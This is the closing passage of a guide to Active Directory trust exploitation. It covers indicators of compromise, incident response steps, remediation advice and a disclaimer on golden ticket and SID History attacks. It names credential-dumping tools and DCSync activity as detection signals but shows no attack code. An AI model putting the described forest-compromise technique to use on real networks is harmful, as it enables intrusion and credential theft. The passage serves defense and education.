Detecting a Compromise

Indicators of Compromise (IOCs):

  • Presence of Mimikatz or similar credential dumping tools
  • Unusual DCSync activity
  • Golden tickets in memory
  • Unexpected cross-domain access
  • Suspicious process creation (e.g., PsExec, WMI)

Immediate Response Steps

# 1. Isolate affected systems
# - Disconnect from network if necessary

# 2. Collect forensic evidence
# - Dump memory for analysis
# - Collect event logs
# - Preserve system state

# 3. Reset compromised credentials
# - Reset KRBTGT password (twice)
# - Reset all DA and EA passwords
# - Reset trust account passwords

# 4. Invalidate existing tickets
# - Restart all DCs to invalidate cached tickets
# - Or use Mimikatz to purge tickets from memory

# 5. Investigate the scope of compromise
# - Determine what resources were accessed
# - Identify all affected systems
# - Assess data exposure

Long-term Remediation

  1. Patch all systems: Apply latest security patches and update all software
  2. Review and strengthen controls: Implement SID filtering where possible, deploy ESAE/Red Forest architecture, implement PAWs for administrative access
  3. Enhance monitoring: Deploy SIEM, implement behavioral analytics, set up real-time alerting
  4. Conduct security training: Train administrators on security best practices, conduct phishing simulations, educate users on security awareness

Conclusion

The trust relationships that underpin Active Directory, while necessary for its operation, represent a significant attack surface. The exploitation of parent-child domain trusts is a well-established technique for privilege escalation, and as demonstrated in this guide, a determined attacker with initial access to a child domain has multiple pathways to compromise the entire forest.

The golden ticket attack with SID History injection is one of the most effective and dangerous techniques in an attacker's arsenal. It requires minimal technical sophistication once Domain Admin access is obtained in a child domain, and it can be executed in under 15 minutes.

Key Takeaways:

  • Parent-child domain trusts are implicit, bidirectional, and transitive within a forest
  • A compromised child domain can lead to full forest compromise
  • The golden ticket attack is difficult to detect without proper monitoring
  • Defense-in-depth strategies are essential to mitigate this threat
  • Regular security assessments and monitoring are critical

Organizations must implement a robust defense-in-depth strategy, combining preventative measures, proactive detection, and rapid response capabilities. This includes implementing SID filtering where applicable, deploying ESAE/Red Forest architectures, regularly resetting KRBTGT passwords, restricting DCSync permissions, and maintaining comprehensive monitoring and alerting systems.

🛡️ Defense Summary:
  • ✓ Implement SID filtering on external trusts
  • ✓ Deploy ESAE/Red Forest architecture
  • ✓ Reset KRBTGT passwords quarterly
  • ✓ Restrict DCSync permissions
  • ✓ Monitor for DCSync and golden ticket usage
  • ✓ Implement behavioral analytics
  • ✓ Use BloodHound for attack path analysis
  • ✓ Maintain comprehensive logging and alerting

⚠️ DISCLAIMER: This guide is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper written authorization before conducting security assessments or penetration tests. The techniques described herein should only be used by qualified security professionals in controlled environments with explicit permission. The author assumes no liability for misuse of this information.
